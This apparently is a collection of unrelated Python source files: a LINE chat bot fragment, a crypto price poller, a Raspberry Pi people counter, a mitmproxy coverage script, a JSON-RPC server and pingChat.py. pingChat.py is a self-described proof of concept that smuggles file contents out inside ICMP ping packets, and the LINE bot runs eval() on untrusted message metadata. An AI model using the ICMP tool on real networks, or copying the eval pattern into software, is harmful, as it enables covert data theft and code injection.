k = len(nama)//21
for a in range(k+1):
txt = u''
s = 0
b = []
for i in room.contacts[a*20: (a+1)*20]:
b.append(
{"S": str(s), "E": str(s+6), "M": i.mid})
s += 7
txt += u'@mal \n'
cl.sendTagLocation(
to, txt, {u'MENTION': json.dumps({'MENTIONEES': b})})
elif msg.toType == 2:
group = cl.getGroup(to)
nama = [contact.mid for contact in group.members]
k = len(nama)//21
for a in range(k+1):
txt = u''
s = 0
b = []
for i in group.members[a*20: (a+1)*20]:
b.append(
{"S": str(s), "E": str(s+6), "M": i.mid})
s += 7
txt += u'@mal \n'
cl.sendTagLocation(
to, txt, {u'MENTION': json.dumps({'MENTIONEES': b})})
elif cmd.startswith('un:'):
try:
mes = int(cmd[3:])
except:
mes = 1
M = cl.getRecentMessagesV2(to, 1001)
MId = []
for ind, i in enumerate(M):
if ind == 0:
pass
else:
if i._from == clMID:
MId.append(i.id)
if len(MId) == mes:
break
for i in MId:
try:
cl.unsendMessage(i)
except:
pass
elif cmd.startswith("set:"):
a = cmd[4:]
if a == 'all':
b = "[All settings]"
for c in set2:
b += "\n{}: {}".format(c, str(set2[c]))
cl.relatedMessage(to, b, msg_id)
elif a == 'all on':
for b in set2:
set2[b] = True
cl.relatedMessage(to, "success\nAll:True", msg_id)
elif a == 'all off':
for b in set2:
set2[b] = False
cl.relatedMessage(to, "success\nAll:False", msg_id)
elif a in set2:
if set2[a] == True:
set2[a] = False
cl.relatedMessage(
to, "success\n{}:False".format(a), msg_id)
else:
set2[a] = True
cl.relatedMessage(
to, "success\n{}:True".format(a), msg_id)
elif cmd.startswith("debugadd:"):
x = cmd[9:]
if x in test["debug"]:
cl.relatedMessage(
to, f"{x} already in", msg_id)
else:
test["debug"].append(x)
cl.relatedMessage(
to, f"okay\nadd {x}", msg_id)
elif cmd.startswith("ccmd:"):
a = cmd.split(":")
if len(a) == 3 and a[1] != "" and a[2] != "":
if a[1] in set['ccmd']:
for b in set['ccmd']:
if a[2] in set['ccmd'][b]:
cl.relatedMessage(
to, "Overlap\nkey: {}\ncmd: {}".format(b, a[2]), msg_id)
return
elif a[2] in ['help', 'allcmd', 'cmds', '幫助', '指令表', '指令', 'cmd', 'un', 'set', 'ccmd', 'dcmd', 'op', 'cra', 'ccra', 'test1', 'test2', 'debugadd', 'test3', 'test4', 'test5', 'test6']:
cl.relatedMessage(
to, "Instructions are not legal\ncmd: {}".format(a[2]), msg_id)
return
set['ccmd'][a[1]].append(a[2])
cl.relatedMessage(
to, "New customization\nkey: {}\ncmd: {}".format(a[1], a[2]), msg_id)
elif cmd.startswith("dcmd:"):
a = cmd[5:]
if a != "":
for b in set['ccmd']:
if a in set['ccmd'][b]:
set['ccmd'][b].remove(a)
cl.relatedMessage(
to, "Delete Custom Customs Directive\nkey: {}\ncmd: {}".format(b, a), msg_id)
break
elif cmd.startswith("op:"):
mids_re = re.compile("u[a-z0-9]{32}")
mids = mids_re.findall(cmd)
targets = []
for l in mids:
if l not in targets:
if ismid(l):
targets.append(l)
if 'MENTION' in msg.contentMetadata.keys() != None:
MENTION = eval(msg.contentMetadata['MENTION'])
for x in MENTION["MENTIONEES"]:
if x["M"] not in targets:
targets.append(x["M"])
for target in targets:
if target in set["owner"]:
set["owner"].remove(target)
else:
set["owner"].append(target)
cl.relatedMessage(to, "Permission adjustment", msg_id)
elif op.type in [60]:
pass
elif op.param1 in test["debug"] or set2["debugall"]:
if op.type in OpType._VALUES_TO_NAMES:
print(
f"[ {str(op.type)} ]{OpType._VALUES_TO_NAMES[op.type].replace('_', ' ')}")
else:
print(f"[ {str(op.type)} ]UNKNOWN")
print(op)
except Exception as e:
# print(e)
error_class = e.__class__.__name__ # Number of error
detail = e.args[0] # Details
cal, exc, tb = sys.exc_info() # Obtain Call Stack
lastCallStack = traceback.extract_tb(tb)[-1] # Obtain Call Stack Last information
fileName = lastCallStack[0] # A file name acquired
lineNum = lastCallStack[1] # Take the line number
funcName = lastCallStack[2] # Get the name of the function
errMsg = "File \"{}\", line {}, in {}: [{}] {}".format(
fileName, lineNum, funcName, error_class, detail)
print(errMsg)
while True:
try:
ops = oepoll.singleTrace(count=50)
if ops is not None:
for op in ops:
oepoll.setRevision(op.revision)
thread = threading.Thread(target=lineBot, args=(op,))
thread.start()
except Exception as e:
print(e)
|
market_data.py | from algoplex.api.common.market_data import MarketData
import threading
import time
import requests
import json
class MarketData(MarketData):
api_url = 'https://coincheck.com/api/ticker'
def __init__(self, poll_period_sec):
self.poll_period_sec = poll_period_sec
self.subscribers = []
self.subscribed = False
self.watcher = None
self.last_trade_price = None
self.watcher = None
self.active = False
def subscribe(self, subscriber):
self.subscribers.append(subscriber)
if(not self.subscribed):
self.start_subscription()
def unsubscribe(self, subscriber):
self.subscribers.remove(subscriber)
if(self.subscribers.__len__() == 0):
self.active = False
def start_subscription(self):
self.active = True
self.watcher = threading.Thread(target=self.watch_market_data)
self.watcher.start()
def watch_market_data(self):
while self.active:
try:
new_trade_price = self.get_last_price()
if(new_trade_price != self.last_trade_price
and new_trade_price != None):
self.last_trade_price = new_trade_price
for subscriber in self.subscribers:
subscriber.update(new_trade_price)
except requests.exceptions.ConnectionError:
print('Connection refused')
time.sleep(self.poll_period_sec)
def get_last_price(self):
try:
response = requests.get(self.api_url)
if(response.ok):
js = json.loads(response.text)
new_trade_price = float(js['last'])
return new_trade_price
except requests.exceptions.ConnectionError:
print('MarketData: connection refused')
return None
|
count people with magnetic sensor - local MQTT publish.py | # Import standard python modules
import time
import sys
import threading
import datetime
# Import Raspberry Hardware
import board
import busio
# Import ADS1115 module
import adafruit_ads1x15.ads1115 as ADS
from adafruit_ads1x15.analog_in import AnalogIn
# Import RPi.GPIO Module
import RPi.GPIO as GPIO
# Import paho MQTT Client
import paho.mqtt.client as mqtt
# Define global vars #
# Control of sincronization in Threads
lock = threading.RLock()
# Setup show data time
showDataTime=20
# Define Classes #
# Define class for instance objects in threading
class DataCount():
def __init__(self, mqttClient):
self.countTimes=0
self.client=mqttClient
# Define functions #
# Define functions for paralelism
def show_data(peopleCount):
counted=False
while True:
"""show data every 20 seconds and reset countTimes"""
if(int(time.time())%showDataTime==0):
if(not counted):
lock.acquire()
peopleCount.client.publish("piso0/entrada0/personasMag",
peopleCount.countTimes)
peopleCount.countTimes=0
lock.release()
counted=True
else:
counted=False
# Define callback functions which will be called when certain events happen.#
def on_connect(client, userdata, flags, rc):
# Connected function will be called when the client connects.
print("Conectado con codigo resultante: "+str(rc))
client.connectedFlag=True
def on_disconnect(client):
# Disconnected function will be called when the client disconnects.
print("¡Se ha Desconectado!")
os._exit(1)
def main():
if(len(sys.argv)!=2):
sys.stderr.write('Usage: "{0}" $hostAddress\n'.format(sys.argv[0]))
os._exit(1)
# Create the I2C bus
i2c = busio.I2C(board.SCL, board.SDA)
# Create the ADC object using the I2C bus
ads = ADS.ADS1115(i2c)
# Create single-ended input on channel 0
chan = AnalogIn(ads, ADS.P0)
# Dict with some GPIO pin numbers
pinList={"countState":7, "count":8}
# Setup GPIO setmode
GPIO.setmode(GPIO.BCM)
# Set GPIO pin signal OUT and initial value "shutdown"
GPIO.setup(list(pinList.values()), GPIO.OUT, initial=GPIO.LOW)
# Setup MQTT instance
client = mqtt.Client()
# Setup the callback functions
client.on_connect = on_connect
client.on_disconnect = on_disconnect
# Setup Control vars
client.connectedFlag=False
# Connect to the Broker server.
print("conectando al broker")
client.connect(sys.argv[1], 1883, 60)
client.loop_start()
while not client.connectedFlag:
print("Esperando conexión")
time.sleep(1)
# Control of count system
peopleCount=DataCount(client)
# When magnetic element is far the min value is reached
sensorValueMin=6900
# When magnetic element is near the max value is reached
sensorValueMax=10300
"""When magnectic element are middle of distances between min and
max
"""
sensorValueMedium=(int((sensorValueMax-sensorValueMin)/2)
+ sensorValueMin)
baseTime=time.time()
countTemp=0 # Count value while state count and doesn't show
countTempLast=0 # For toggle LED alert count +1
# Flags for execute only one time (turn off, turn on)
counted=False
countState=False
countTempLastState=True
countRate=0.6
# Setup Threading, to show data every 20 seconds
hilo0=threading.Thread(target=show_data, args=[peopleCount,])
hilo0.start()
while True:
sensorValue = chan.value # Distance of magnetic sensor
# Case if are plaque in high position
if(sensorValue>=sensorValueMedium):
baseTime=time.time()
if(countTemp!=0):
lock.acquire()
peopleCount.countTimes+=countTemp
lock.release()
countTemp=0
# Turn off LED to alert plaque in high position
if(countState):
countState=False
GPIO.output(pinList.get("countState"), GPIO.LOW)
else: # Case if are plaque in low position
"""Triggered every showDataTime-1 seconds for update
counTimes
"""
# print("is",sensorValue, sensorValueMedium)
if(int(time.time())%(showDataTime-1)==0):
# Do only one time per showDataTime-1
if(not counted):
lock.acquire()
peopleCount.countTimes+=countTemp
lock.release()
# Update base time with rate residue
baseTime=time.time()-(time.time()%countRate)
# Update countTempLast for LED count alert
continueTime=time.time()-baseTime
countTempLast=int(continueTime/countRate)+1
counted=True
else:
counted=False
continueTime=time.time()-baseTime
# Count rate + 1 more (case 0 to 0.6)
countTemp=int(continueTime/countRate)+1
# Turn on LED to alert plaque in low position
if(not countState):
countState=True
GPIO.output(pinList.get("countState"), GPIO.HIGH)
# Turn on LED to alert every counted +1 for 1 cycle time
if(countTempLast!=countTemp):
countTempLast=countTemp
countTempLastState=False
GPIO.output(pinList.get("count"), GPIO.HIGH)
elif(not countTempLastState):
countTempLastState=True
GPIO.output(pinList.get("count"), GPIO.LOW)
time.sleep(0.1) # Cycle time
if __name__=="__main__":
try:
main()
except:
print("{} line {}".format(sys.exc_info()[0],
sys.exc_info()[-1].tb_lineno))
GPIO.cleanup() |
individual_coverage.py | import io
import contextlib
import os
import sys
import glob
import multiprocessing
import configparser
import itertools
import pytest
def run_tests(src, test, fail):
stderr = io.StringIO()
stdout = io.StringIO()
with contextlib.redirect_stderr(stderr):
with contextlib.redirect_stdout(stdout):
e = pytest.main([
'-qq',
'--disable-pytest-warnings',
'--no-faulthandler',
'--cov', src.replace('.py', '').replace('/', '.'),
'--cov-fail-under', '100',
'--cov-report', 'term-missing:skip-covered',
test
])
if e == 0:
if fail:
print("UNEXPECTED SUCCESS:", src, "Please remove this file from setup.cfg tool:individual_coverage/exclude.")
e = 42
else:
print("SUCCESS: ", src)
else:
if fail:
print("IGNORING FAIL: ", src)
e = 0
else:
cov = [l for l in stdout.getvalue().split("\n") if (src in l) or ("was never imported" in l)]
if len(cov) == 1:
print("FAIL: ", cov[0])
else:
print("FAIL: ", src, test, stdout.getvalue(), stdout.getvalue())
print(stderr.getvalue())
print(stdout.getvalue())
sys.exit(e)
def start_pytest(src, test, fail):
# run pytest in a new process, otherwise imports and modules might conflict
proc = multiprocessing.Process(target=run_tests, args=(src, test, fail))
proc.start()
proc.join()
return (src, test, proc.exitcode)
def main():
c = configparser.ConfigParser()
c.read('setup.cfg')
fs = c['tool:individual_coverage']['exclude'].strip().split('\n')
no_individual_cov = [f.strip() for f in fs]
excluded = ['mitmproxy/contrib/', 'mitmproxy/test/', 'mitmproxy/tools/', 'mitmproxy/platform/']
src_files = glob.glob('mitmproxy/**/*.py', recursive=True) + glob.glob('pathod/**/*.py', recursive=True)
src_files = [f for f in src_files if os.path.basename(f) != '__init__.py']
src_files = [f for f in src_files if not any(os.path.normpath(p) in f for p in excluded)]
ps = []
for src in sorted(src_files):
test = os.path.join("test", os.path.dirname(src), "test_" + os.path.basename(src))
if os.path.isfile(test):
ps.append((src, test, src in no_individual_cov))
result = list(itertools.starmap(start_pytest, ps))
if any(e != 0 for _, _, e in result):
sys.exit(1)
pass
if __name__ == '__main__':
main()
|
pingChat.py | #!/usr/bin/python
import time
import socket
import struct
import sys
import array
import threading
listeningIP = "149.161.253.97"
seqNumber = 0 # Sequence Number is Incremented every time a ping is sent...
ICMP_ECHOREPLY = 0 # Echo reply (per RFC792)
ICMP_ECHO = 8 # Echo request (per RFC792)
ICMP_MAX_RECV = 2048
#https://gist.github.com/pklaus/856268
#https://github.com/l4m3rx/python-ping/blob/master/ping.py
def default_timer():
if sys.platform == "win32":
return time.clock()
else:
return time.time()
def calcChecksum(source_string):
"""
A port of the functionality of in_cksum() from ping.c
Ideally this would act on the string as a series of 16-bit ints (host
packed), but this works.
Network data is big-endian, hosts are typically little-endian
"""
if (len(source_string) % 2):
source_string += "\x00"
converted = array.array("H", source_string)
if sys.byteorder == "big":
converted.bytewap()
val = sum(converted)
val &= 0xffffffff # Truncate val to 32 bits (a variance from ping.c, which
# uses signed ints, but overflow is unlikely in ping)
val = (val >> 16) + (val & 0xffff) # Add high 16 bits to low 16 bits
val += (val >> 16) # Add carry from above (if any)
answer = ~val & 0xffff # Invert and truncate to 16 bits
answer = socket.htons(answer)
return answer
def listenPing():
counter = 1
rec = open("rec.txt","a")
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
s.bind((listeningIP, 1))
stay = True
msg = []
while stay:
try:
data = s.recv(1024)
ipHeader = data[:20]
iphVersion, iphTypeOfSvc, iphLength, \
iphID, iphFlags, iphTTL, iphProtocol, \
iphChecksum, iphSrcIP, iphDestIP = struct.unpack(
"!BBHHHBBHII", ipHeader
)
icmpHeader = data[20:28]
icmpType, icmpCode, icmpChecksum, \
icmpPacketID, icmpSeqNumber = struct.unpack(
"!BBHHH", icmpHeader
)
srcIP = socket.inet_ntoa(struct.pack("!L", iphSrcIP))
if str(data[28:32]) == '99zz':
stay = False
break
else:
if str(srcIP) != listeningIP and icmpType != 0:
msg.insert(icmpSeqNumber, str(data[28:]))
#rec.write(data[28:] + "\r\n")
#print "SrcIP: " + str(srcIP) + " M:" + data[28:]
except:
print "\nUnable to listen for icmp packets...\n"
break
s.close()
for dat in msg:
rec.write(dat + "\r\n")
rec.close()
def sendMessage(destIP, destMessage):
global seqNumber, ICMP_ECHO
from random import randint
try:
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
except OSError as e:
print("Failed with socket error: %s" % str(e))
print("This requires root privileges...")
raise
exitLoop = False
while exitLoop == False:
if len(destMessage) > 64:
currentMessage = destMessage[:63]
destMessage = destMessage[63:]
else:
currentMessage = destMessage
exitLoop = True
randomInt = randint(0,30000)
packetID = (13927 ^ randomInt) & 0xFFFF
packetChecksum = 0
icmpHeader = struct.pack("!BBHHH", ICMP_ECHO, 0, packetChecksum, packetID, seqNumber)
bytes = struct.calcsize("d")
icmpData = currentMessage
#icmpData = struct.pack("d", default_timer()) + icmpData
packetChecksum = calcChecksum(icmpHeader + icmpData)
# Reconstruct the header with the correct checksum...
icmpHeader = struct.pack("!BBHHH", ICMP_ECHO, 0, packetChecksum, packetID, seqNumber)
icmpPacket = icmpHeader + icmpData
sentTime = default_timer()
try:
s.sendto(icmpPacket, (destIP, 1))
except OSError as e:
print ("Failure to Send ICMP Packet %s" % str(e))
return 0
except:
return 0
# Increment the sequence number of the packet...
seqNumber += 1
s.close()
return sentTime
def sendPing(destIP, destFile):
if destFile == '99zz':
sentTime = sendMessage(destIP, destFile)
else:
with open(destFile) as f:
for line in f:
ln = line.split(" ")
for word in ln:
sentTime = sendMessage(destIP, word)
return sentTime
def main():
print
print "pingChat was built as a proof-of-concept to demonstrate how to"
print "exfil information using the ICMP protocol."
print
print "Remember to modify the listeningIP at the beginning of the file..."
print
#t = threading.Thread(target=listenPing)
#t.start()
exitLoop = False
while exitLoop == False:
# Listen for incoming icmp messages until a message is crafted to be sent...
print "\n"
selection = raw_input("Press S at any time to Send a listeningIPMessage, Q to Quit\n")
if selection == 'S' or selection == 's':
destIP = raw_input("Destination IP: ")
destMessage = raw_input("Message to Send: ")
sentTime = sendPing(destIP, destMessage)
if sentTime == 0:
print "Failed to send the message. Verify the IP is correct."
else:
print "Message Sent Successfully @ " + str(sentTime)
elif selection == 'Q' or selection == 'q':
sendPing(destIP,'99zz')
#sendPing(listeningIP, '99zz')
sys.exit(0)
else:
pass
if __name__ == '__main__':
main()
|
MotifFinderHomerServer.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from MotifFinderHomer.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'MotifFinderHomer'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from MotifFinderHomer.MotifFinderHomerImpl import MotifFinderHomer # noqa @IgnorePep8
impl_MotifFinderHomer = MotifFinderHomer(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'MotifFinderHomer'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_MotifFinderHomer.find_motifs,
name='MotifFinderHomer.find_motifs',
types=[dict])
self.method_authentication['MotifFinderHomer.find_motifs'] = 'required' # noqa
self.rpc_service.add(impl_MotifFinderHomer.BuildFastaFromSequenceSet,
name='MotifFinderHomer.BuildFastaFromSequenceSet',
types=[dict])
self.method_authentication['MotifFinderHomer.BuildFastaFromSequenceSet'] = 'required' # noqa
self.rpc_service.add(impl_MotifFinderHomer.ExtractPromotersFromFeatureSetandDiscoverMotifs,
name='MotifFinderHomer.ExtractPromotersFromFeatureSetandDiscoverMotifs',
types=[dict])
self.method_authentication['MotifFinderHomer.ExtractPromotersFromFeatureSetandDiscoverMotifs'] = 'required' # noqa
self.rpc_service.add(impl_MotifFinderHomer.DiscoverMotifsFromFasta,
name='MotifFinderHomer.DiscoverMotifsFromFasta',
types=[dict])
self.method_authentication['MotifFinderHomer.DiscoverMotifsFromFasta'] = 'required' # noqa
self.rpc_service.add(impl_MotifFinderHomer.DiscoverMotifsFromSequenceSet,
name='MotifFinderHomer.DiscoverMotifsFromSequenceSet',
types=[dict])
self.method_authentication['MotifFinderHomer.DiscoverMotifsFromSequenceSet'] = 'required' # noqa
self.rpc_service.add(impl_MotifFinderHomer.status,
name='MotifFinderHomer.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'MotifFinderHomer ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
